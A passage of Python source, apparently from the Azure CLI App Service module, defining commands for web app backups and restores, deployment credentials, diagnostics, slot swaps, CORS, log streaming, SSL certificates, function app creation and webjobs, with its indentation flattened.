instance.admin_site_name = admin_site_name
return instance
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_request = BackupRequest(backup_request_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
from datetime import datetime
backup_name = '{0}_{1}'.format(webapp_name, datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(db_name, db_type, db_connection_string):
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
elif any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(frequency):
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _normalize_sku(sku):
sku = sku.upper()
if sku == 'FREE':
return 'F1'
elif sku == 'SHARED':
return 'D1'
return sku
def _get_location_from_resource_group(cli_ctx, resource_group_name):
from azure.mgmt.resource import ResourceManagementClient
client = get_mgmt_service_client(cli_ctx, ResourceManagementClient)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publish_profiles(cmd, resource_group_name, name, slot=None):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
for profile in profiles:
if profile['publishMethod'] == 'MSDeploy':
scmUrl = profile['publishUrl'].replace(":443", "")
cd_url = 'https://' + profile['userName'] + ':' + profile['userPWD'] + '@' + scmUrl + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
break
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level=level)
application_logs = ApplicationLogsConfig(file_system=fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
elif action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
else: # reset
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_suffix = '.' + site.default_host_name.split('.', 1)[1]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
import time
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file):
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get')
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, cert_resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(cert_resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def _update_host_name_ssl_state(cli_ctx, resource_group_name, webapp_name, location,
host_name, ssl_state, thumbprint, slot=None):
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=location)
name = '{}({})'.format(webapp_name, slot) if slot else webapp_name
return _generic_site_operation(cli_ctx, resource_group_name, name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp.location,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp.location,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper(object):
def __init__(self, client, linux=False):
self._client = client
self._linux = linux
self._stacks = []
def resolve(self, display_name):
self._load_stacks()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks()
return self._stacks
@staticmethod
def update_site_config(stack, site_config):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(stack, site_config):
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, runtime=None, consumption_plan_location=None,
deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, deployment_container_image_name=None, tags=None):
# pylint: disable=too-many-statements
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
client = web_client_factory(cmd.cli_ctx)
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
# for linux consumption plan app the os_type should be Linux & should have a runtime specified
# currently in other cases the runtime is ignored
if is_linux and not runtime:
raise CLIError("usage error: --runtime RUNTIME required for linux functions apps with consumption plan.")
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
if consumption_plan_location:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_WORKER_RUNTIME', value=runtime))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
else:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='beta'))
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
site_config.linux_fx_version = _format_fx_version('appsvc/azure-functions-runtime')
else:
functionapp_def.kind = 'functionapp'
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
# adding appsetting to site to make it a function
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_NODE_DEFAULT_VERSION', value='8.11.1'))
if consumption_plan_location is None:
site_config.always_on = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully"
"created but is not active until content is published using"
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
return functionapp
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name.value
allowed_storage_types = ['Standard_GRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
return client.list_geo_regions(full_sku, linux_workers_enabled)
def _check_zip_deployment_status(deployment_status_url, authorization, timeout=None):
import requests
import time
total_trials = (int(timeout) // 2) if timeout else 450
for _num_trials in range(total_trials):
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization)
res_dict = response.json()
if res_dict.get('status', 0) == 3:
logger.warning("Zip deployment failed status %s", res_dict['status_text'])
break
elif res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
raise ValueError("""Deployment is taking longer than expected. Please verify
status at '{}' beforing launching the app""".format(deployment_status_url))
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
